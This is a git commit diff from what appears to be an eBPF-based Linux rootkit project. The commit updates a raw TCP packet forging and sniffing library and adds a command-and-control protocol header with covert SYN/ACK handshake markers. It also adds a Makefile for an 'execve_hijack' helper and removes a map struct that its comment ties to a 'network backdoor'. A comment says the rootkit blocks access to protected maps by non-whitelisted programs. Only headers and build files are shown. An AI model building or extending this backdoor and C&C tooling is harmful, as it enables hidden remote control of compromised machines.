Updated my RawTCPLib library with newest version supporting sniffing for payloads. Also new data in preparation for complete RCE module

2025-12-16 15:23:07 +08:00 · 2022-02-16 19:38:39 -05:00
parent 2ae705f037
commit 431a019931
8 changed files with 63 additions and 15 deletions
--- a/src/client/lib/RawTCP.h
+++ b/src/client/lib/RawTCP.h
@@ -31,5 +31,6 @@ int rawsocket_send(packet_t packet);

 packet_t rawsocket_sniff();

+packet_t rawsocket_sniff_pattern(char* payload_pattern);

 #endif
--- a/src/client/lib/libRawTCP_Lib.a
+++ b/src/client/lib/libRawTCP_Lib.a
--- a/src/common/map_prot.h
+++ b/src/common/map_prot.h
@@ -11,19 +11,4 @@
 /*PROTECTED MAPS*/
 //Any attempt to access these maps will be blocked by the rootkit if the program is not whitelisted

-//Execution hijacking, holder of requesting/response data sent from/to the network backdoor
-#define EXEC_HIJACK_REQUEST_PROGRAM_MAX_LEN 256
-#define EXEC_HIJACK_RESPONSE_PROGRAM_MAX_LEN 256
-struct exec_hijack_data{ //Map value
-	char req_buf[EXEC_HIJACK_REQUEST_PROGRAM_MAX_LEN];
-    char res_buf[EXEC_HIJACK_RESPONSE_PROGRAM_MAX_LEN];
-};
-
-struct exec_prot_hijack{ //Map
-	__uint(type, BPF_MAP_TYPE_ARRAY);
-	__uint(max_entries, 1);
-	__type(key, __u32); //just 1 entry allowed
-	__type(value, struct exec_hijack_data);
-} exec_hijack SEC(".maps");
-
 #endif
--- a/src/ebpf/include/packet/c&c/c&c.h
+++ b/src/ebpf/include/packet/c&c/c&c.h
@@ -0,0 +1,10 @@
+#ifndef __BPF_CC_H
+#define __BPF_CC_H
+
+#define CC_PROT_SYN "CC_SYN"
+#define CC_PROT_ACK "CC_ACK"
+#define CC_PROT_SYN_ACK "CC_SYN_ACK"
+#define CC_PROT_SEPARATOR "#"
+
+
+#endif
--- a/src/helpers/Makefile
+++ b/src/helpers/Makefile
@@ -0,0 +1,16 @@
+CC = gcc
+HEADERS = lib/RawTCP.h
+EXTRA_CFLAGS= -I$(PWD)/lib
+
+default:
+	make execve_hijack
+
+execve_hijack.o: execve_hijack.c $(HEADERS)
+	gcc -c execve_hijack.c
+
+execve_hijack: execve_hijack.o lib/libRawTCP_Lib.a
+	gcc -lm -o execve_hijack execve_hijack.o -L. lib/libRawTCP_Lib.a
+
+clean:
+	-rm -f execve_hijack.o
+	-rm -f execve_hijack
--- a/src/helpers/execve_hijack.o
+++ b/src/helpers/execve_hijack.o
--- a/src/helpers/lib/RawTCP.h
+++ b/src/helpers/lib/RawTCP.h
@@ -0,0 +1,36 @@
+#ifndef HEADER_RAWTCP_LIB
+#define HEADER_RAWTCP_LIB
+
+#include <stdlib.h>
+
+//Packet_t structure
+typedef struct packet_t{
+    struct iphdr *ipheader;
+    struct tcphdr *tcpheader;
+    char *payload;
+    int payload_length;
+    char* packet;
+}packet_t;
+
+//PacketForger headers
+packet_t build_standard_packet(
+    u_int16_t source_port,
+    u_int16_t destination_port,
+    const char* source_ip_address,
+    const char* destination_ip_address,
+    u_int32_t packet_length,
+    char* payload
+    );
+
+int packet_destroy(packet_t packet);
+
+int set_TCP_flags(packet_t packet, int hex_flags);
+
+//SocketManager headers
+int rawsocket_send(packet_t packet);
+
+packet_t rawsocket_sniff();
+
+packet_t rawsocket_sniff_pattern(char* payload_pattern);
+
+#endif
--- a/src/helpers/lib/libRawTCP_Lib.a
+++ b/src/helpers/lib/libRawTCP_Lib.a